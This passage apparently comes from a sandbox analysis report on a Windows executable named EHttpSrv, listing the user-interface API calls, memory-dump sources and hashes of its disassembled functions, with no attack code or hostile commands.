                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#1558#2364InvalidateRect
                                                                                                                • String ID: $
                                                                                                                • API String ID: 348224052-3993045852
                                                                                                                • Opcode ID: 1148c658d442e2151bc7ea04e97a48f2f7aef3d4fec40fc2a9f0050c973db9e7
                                                                                                                • Instruction ID: 798c43613874377f5c967f85987ebc91dfb3d139841aa2bef4ee4f89f42f74a9
                                                                                                                • Opcode Fuzzy Hash: 1148c658d442e2151bc7ea04e97a48f2f7aef3d4fec40fc2a9f0050c973db9e7
                                                                                                                • Instruction Fuzzy Hash: 37216FB1640B05AFD320DB69CC86F97B7ECBF98701F008A1DB696C65D0E7B4E5048B51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042D850: #524.MFC80U(00000000,00000000,00000000,FEEA6C22,?,2047ED3A,20479C16,000000FF,204263A6,?,000000B8,FEEA6C22,?,?,?), ref: 2042D87F
                                                                                                                  • Part of subcall function 2042D850: #563.MFC80U(00000000,00000000,00000000,FEEA6C22,?,2047ED3A,20479C16,000000FF,204263A6,?,000000B8,FEEA6C22,?,?,?), ref: 2042D898
                                                                                                                  • Part of subcall function 20462000: #516.MFC80U(0000015E,00000000,00000038,FEEA6C22,-00003AB4,?,2047D956,000000FF,2047088E,?,?,00000165,FEEA6C22,00000003,-00003AB4), ref: 20462030
                                                                                                                  • Part of subcall function 2045EF30: #516.MFC80U(0000024A,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,2047DCBB,000000FF,204708B5,?,?,?,?,?,00000165), ref: 2045EF61
                                                                                                                  • Part of subcall function 2045FDC0: #516.MFC80U(00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6,000000FF,204708CB,?,?,?,?), ref: 2045FDF4
                                                                                                                  • Part of subcall function 2045FDC0: #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6), ref: 2045FE3E
                                                                                                                  • Part of subcall function 2045FDC0: #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6), ref: 2045FE50
                                                                                                                  • Part of subcall function 2045FDC0: GetSystemMetrics.USER32(00000032), ref: 2045FEB5
                                                                                                                  • Part of subcall function 2045FDC0: GetSystemMetrics.USER32(00000031), ref: 2045FEBA
                                                                                                                  • Part of subcall function 2045FDC0: #1555.MFC80U(00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FEBF
                                                                                                                  • Part of subcall function 2045FDC0: GetSysColor.USER32(00000005), ref: 2045FEC6
                                                                                                                  • Part of subcall function 2045FDC0: #1079.MFC80U(?,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FED4
                                                                                                                  • Part of subcall function 2045FDC0: LoadIconW.USER32(00000000,00007F00), ref: 2045FEF3
                                                                                                                  • Part of subcall function 2045FDC0: #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF07
                                                                                                                  • Part of subcall function 2045FDC0: DestroyCursor.USER32(?), ref: 2045FF1E
                                                                                                                  • Part of subcall function 204611D0: #516.MFC80U(00000258,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,?,2047DA78,000000FF,204708E1,?,?,?,?,?), ref: 20461202
                                                                                                                  • Part of subcall function 204611D0: #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000258,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,?,2047DA78,000000FF), ref: 20461250
                                                                                                                  • Part of subcall function 204611D0: GetSystemMetrics.USER32(00000032), ref: 204612B9
                                                                                                                  • Part of subcall function 204611D0: GetSystemMetrics.USER32(00000031), ref: 204612BE
                                                                                                                  • Part of subcall function 204611D0: #1555.MFC80U(00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 204612C3
                                                                                                                  • Part of subcall function 204611D0: GetSysColor.USER32(00000005), ref: 204612CA
                                                                                                                  • Part of subcall function 204611D0: #1079.MFC80U(?,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 204612D8
                                                                                                                  • Part of subcall function 204611D0: LoadIconW.USER32(00000000,00007F00), ref: 204612F1
                                                                                                                  • Part of subcall function 204611D0: #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 20461307
                                                                                                                  • Part of subcall function 204611D0: DestroyCursor.USER32(00000000), ref: 2046131A
                                                                                                                • #762.MFC80U(00000A00,?,?,?,?,?,?,?,?,?,?,00000165,FEEA6C22,00000003,-00003AB4), ref: 20470994
                                                                                                                • #762.MFC80U(0000074C), ref: 204709CB
                                                                                                                • #762.MFC80U(000004F8), ref: 20470A02
                                                                                                                • #977.MFC80U(?), ref: 20470A3D
                                                                                                                • #977.MFC80U(?,?), ref: 20470A4B
                                                                                                                • #977.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 20470A84
                                                                                                                • #977.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 20470A9E
                                                                                                                • #977.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 20470AB2
                                                                                                                • SetRectEmpty.USER32(?), ref: 20470ABE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #977$#1079#516MetricsSystem$#416#762$#1555ColorCursorDestroyIconLoad$#524#563EmptyRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3482417175-0
                                                                                                                • Opcode ID: 712abb72ca72c193c5dcacdc26a3daf60cbf34dc48453cc04d27f88546aabf47
                                                                                                                • Instruction ID: e834abb8702d319562c4f58ddf1d09b58eb6bf8d53996b5fd876976c9c1fc1e2
                                                                                                                • Opcode Fuzzy Hash: 712abb72ca72c193c5dcacdc26a3daf60cbf34dc48453cc04d27f88546aabf47
                                                                                                                • Instruction Fuzzy Hash: 1A817FB05083899FDB25CF69C844BDABBE8AF98704F04852EE5488B250D778A709CF52
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(?), ref: 204375F8
                                                                                                                • CopyRect.USER32(?,?), ref: 20437619
                                                                                                                • IsWindow.USER32(?), ref: 2043762A
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20437648
                                                                                                                • #3395.MFC80U ref: 20437662
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 20437670
                                                                                                                • SendMessageW.USER32(?,0000120B,00000000,00000001), ref: 20437704
                                                                                                                • SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 20437723
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 20437740
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: MessageSend$RectWindow$#3395CopyInvalidateMetricsSystem
• String ID:
• API String ID: 3025489251-0
• Opcode ID: 04165a8bd1110d92bdb52082952706d917a94f7124bbfd3a28d5fb72b27ad4e5
• Instruction ID: 2874fc8a2a8ffedec40647df49c84152a99f93a404bc40beea944e09dfcd6218
• Opcode Fuzzy Hash: 04165a8bd1110d92bdb52082952706d917a94f7124bbfd3a28d5fb72b27ad4e5
• Instruction Fuzzy Hash: 50414B71204B419FD320DFA9CC85F5BB7E8AB88754F20992DF5E9C3251DB78E8048B22
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #6063$#2311#310#3756#578MessageSendswscanf_s
• String ID:
• API String ID: 3210659254-0
• Opcode ID: 3c5bde393de6e0bc71d2e7c4a20ddef8a4843513411f941f52a4986c94d93fc3
• Instruction ID: 36cab569b6b074d02ee9115f48633608569152ae39f8f4dd4006e701a6c31336
• Opcode Fuzzy Hash: 3c5bde393de6e0bc71d2e7c4a20ddef8a4843513411f941f52a4986c94d93fc3
• Instruction Fuzzy Hash: FA41E271A087019FC714DF94DC90BAB77E9FB84715F008A3DF8459B291EB399905CB92
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #6063$#2311#310#3756#578MessageSendswscanf_s
• String ID:
• API String ID: 3210659254-0
• Opcode ID: 361499e3e154a1532808e9da758d4fdb2c358d8ef259a3228fe50c12ec43d848
• Instruction ID: ea0d6b87ef06e6902964463f505d2c6208afaf29c8ccc4e1efd5cba282a58445
• Opcode Fuzzy Hash: 361499e3e154a1532808e9da758d4fdb2c358d8ef259a3228fe50c12ec43d848
• Instruction Fuzzy Hash: 5C4112B16087009FC710CF50CC90BAA77E9FB88714F00CA3DF8559B291EB799905CB92
APIs
• #310.MFC80U(FEEA6C22), ref: 20425C73
• #3756.MFC80U(?), ref: 20425C8F
• swscanf_s.MSVCR80 ref: 20425CAE
• #2311.MFC80U(?,2048587C,000000FF), ref: 20425CD1
• #6063.MFC80U(?), ref: 20425CE1
• SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 20425D3A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20425D7D
• #6063.MFC80U(20485878), ref: 20425D92
• #578.MFC80U ref: 20425DA6
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #6063MessageSend$#2311#310#3756#578swscanf_s
• String ID:
• API String ID: 858908244-0
• Opcode ID: ae47bf82d3adab582be4daf17f427c03ee7253ca502987780ecfada004406175
• Instruction ID: 2e8279aa7f0b3b15c5be8a18cd1982fd12598ec58ccc737625e19ed89ef2adb1
• Opcode Fuzzy Hash: ae47bf82d3adab582be4daf17f427c03ee7253ca502987780ecfada004406175
• Instruction Fuzzy Hash: 6F4123716087419FC714CF50DC84B5B77E9FB88714F00CA2EF9548B2A1EB389905CB81
APIs
• #310.MFC80U(FEEA6C22), ref: 20424457
• #3756.MFC80U(?), ref: 20424473
• swscanf_s.MSVCR80 ref: 20424492
• #2311.MFC80U(?,2048587C,0000FFFF), ref: 204244B5
• #6063.MFC80U(?), ref: 204244C5
• SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 2042451A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20424559
• #6063.MFC80U(20485878), ref: 2042456A
• #578.MFC80U ref: 20424582
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #6063MessageSend$#2311#310#3756#578swscanf_s
• String ID:
• API String ID: 858908244-0
• Opcode ID: 1464e5cfa7a83aa8a59b78d47f766604f1306e9a887bda0a44e5ac2ff66e6f8e
• Instruction ID: 69451ac66363ffd69de476115491b617f5135a9de66107f067028f297cf54f98
• Opcode Fuzzy Hash: 1464e5cfa7a83aa8a59b78d47f766604f1306e9a887bda0a44e5ac2ff66e6f8e
• Instruction Fuzzy Hash: 314103B16087419FC714DF50CC80B6B77E9FB88714F40CA2DF9559B291EB399905CB92
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: MessageSendWindow$#3395ClientMetricsRectSystemfreemalloc
• String ID:
• API String ID: 1711230558-0
• Opcode ID: c09c4cddeffb2a4e774a2ad75fe4ebdcd482e17445a0f4d63acbd6b2082bbd6d
• Instruction ID: 7c111e8234d5641f4b74ef2d2af4d4f695ebef2d36820c8c541985d8ee9576ad
• Opcode Fuzzy Hash: c09c4cddeffb2a4e774a2ad75fe4ebdcd482e17445a0f4d63acbd6b2082bbd6d
• Instruction Fuzzy Hash: 47315EB1604706AFD7208BA5CC85F1777E8BB88754F11C92CE9D9C7291DB38E905CB61
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: MessagePostRect$#1894#2366#2648ClientParent
• String ID:
• API String ID: 136377152-0
• Opcode ID: f7cddc6b869b18365e28be2dbd63bb103cbc1edc7210e14762cfe86dab28edde
• Instruction ID: 385c1e87878244af9c6bf314d0286646255dcfb790630a3338cf519b74c76bcb
• Opcode Fuzzy Hash: f7cddc6b869b18365e28be2dbd63bb103cbc1edc7210e14762cfe86dab28edde
• Instruction Fuzzy Hash: B621AA727006049BC714DBA8DC84EBBB3F8FB88615B108B5DFA95C7651DA35F800C7A0
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #2011#359#3828#3998#578#5832#607#6735memset
• String ID:
• API String ID: 126714201-0
• Opcode ID: 256313df5807d866f03f49126790f0c027ef40375f6b49a617e38de642894119
• Instruction ID: c763532d55a962847b69b75e6bc18a6ddab311bd77bd401084034ad75326b9cc
• Opcode Fuzzy Hash: 256313df5807d866f03f49126790f0c027ef40375f6b49a617e38de642894119
• Instruction Fuzzy Hash: A23143712087809FD724DBA4C855BEAB7E4AF98714F008A1EF555876D0EB789904C753
APIs
• #4574.MFC80U ref: 2045F24E
• GetClientRect.USER32(?,?), ref: 2045F25C
• #2651.MFC80U(000004C3,0000000F), ref: 2045F28D
  • Part of subcall function 2045D0A0: GetParent.USER32(?), ref: 2045D0B0
  • Part of subcall function 2045D0A0: #2366.MFC80U(00000000), ref: 2045D0B7
  • Part of subcall function 2045D0A0: #4109.MFC80U(00000000,02000000,00000000), ref: 2045D0D7
  • Part of subcall function 2045D0A0: GetClientRect.USER32(?,?), ref: 2045D0F1
  • Part of subcall function 2045D0A0: GetWindowRect.USER32(?,00000000), ref: 2045D116
  • Part of subcall function 2045D0A0: #5609.MFC80U(00000000), ref: 2045D123
  • Part of subcall function 2045D0A0: malloc.MSVCR80 ref: 2045D12A
  • Part of subcall function 2045D0A0: #5713.MFC80U(?,00000000), ref: 2045D177
• #2651.MFC80U(000004D7,00000008,000004C3,0000000F), ref: 2045F2A2
• #2651.MFC80U(00000499,00000008,000004D7,00000008,000004C3,0000000F), ref: 2045F2B7
• #2651.MFC80U(000004D7), ref: 2045F2D3
• #2155.MFC80U(00000000,000004D7), ref: 2045F2E0
• #2651.MFC80U(00000499,000004D7), ref: 2045F2EC
• #2155.MFC80U(00000000,00000499,000004D7), ref: 2045F2F9
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #2651$Rect$#2155Client$#2366#4109#4574#5609#5713ParentWindowmalloc
• String ID:
• API String ID: 1533607108-0
• Opcode ID: 75b32bee038ec3f055f89b3a77d0f563f2ce60f4c12f110e31d42f17823995c4
• Instruction ID: 12caeb71d6cb5cb63b0c79dc7bf450e27fdfd275581a6ec987d697c725427b09
• Opcode Fuzzy Hash: 75b32bee038ec3f055f89b3a77d0f563f2ce60f4c12f110e31d42f17823995c4
• Instruction Fuzzy Hash: D511C3B03403066BD704ABF4C856BBEB7A5AFA0E08F40C62DB6449B6D0DE68AC058755
                                                                                                                APIs
                                                                                                                • #4574.MFC80U(?,20457514), ref: 2042C253
                                                                                                                • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 2042C291
                                                                                                                • GetNextDlgTabItem.USER32(?,00000000,00000000), ref: 2042C2A5
                                                                                                                • #2366.MFC80U(00000000), ref: 2042C2A8
                                                                                                                • #2648.MFC80U(00000000), ref: 2042C2B7
                                                                                                                • #1005.MFC80U(00000000,00000000,00000000,00000000,00000000), ref: 2042C2D1
                                                                                                                • GetNextDlgTabItem.USER32(?,?,00000000), ref: 2042C2E0
                                                                                                                • #2366.MFC80U(00000000), ref: 2042C2E3
                                                                                                                • SetForegroundWindow.USER32(?), ref: 2042C2F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2366ItemNext$#1005#2648#4574ForegroundMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 183709898-0
                                                                                                                • Opcode ID: 30d86843a7a0115f8584d825181697ca30c7dfa468d451f1a6c4215dc9c416e6
                                                                                                                • Instruction ID: 717947ed28c759a126b30f0293c07f5a9e78839d161f282296525fc96fe913fe
                                                                                                                • Opcode Fuzzy Hash: 30d86843a7a0115f8584d825181697ca30c7dfa468d451f1a6c4215dc9c416e6
                                                                                                                • Instruction Fuzzy Hash: 8D112231740B01BBD62457F4DC81FAAB368BB45A14F00C668FA08EB2C0DE69FD4183A0
                                                                                                                APIs
                                                                                                                • #310.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 20444851
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 20444862
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 20444873
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 20444884
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 20444895
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 204448A6
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 204448B7
                                                                                                                • EnterCriticalSection.KERNEL32(00003FC8,?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 204448CF
                                                                                                                • LeaveCriticalSection.KERNEL32(00003FC8), ref: 204448DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310$CriticalSection$EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 2018764849-0
                                                                                                                • Opcode ID: dc30752cbd3352a4a41d008ae2c0dfec2ecbb15ad48c5c87bc3b5eb03c551049
                                                                                                                • Instruction ID: 149e7ac79b37164727e2346f3cd882fd213499b13d4c724ad8dea1ca39136e5a
                                                                                                                • Opcode Fuzzy Hash: dc30752cbd3352a4a41d008ae2c0dfec2ecbb15ad48c5c87bc3b5eb03c551049
                                                                                                                • Instruction Fuzzy Hash: 5F214730008B81DFC311DF64CC88B96BFE4FB65759F108E2DF496826A1DB396648CB92
                                                                                                                APIs
                                                                                                                • GetTextMetricsW.GDI32(?,?), ref: 2043B8B1
                                                                                                                • GetTextExtentPoint32W.GDI32(?,2048B8C8,00000001,?), ref: 2043B8C4
                                                                                                                • memset.MSVCR80 ref: 2043B8D3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Text$ExtentMetricsPoint32memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2649258116-2735817509
                                                                                                                • Opcode ID: f818c91ce8229f5eabd7a1dc3580614bf2c4515ec148b0c47a5bae0681ff08b1
                                                                                                                • Instruction ID: 04d7869c2b87461092ef02d3b1c4d5f8aff85504e6062eabee1153db2eead2da
                                                                                                                • Opcode Fuzzy Hash: f818c91ce8229f5eabd7a1dc3580614bf2c4515ec148b0c47a5bae0681ff08b1
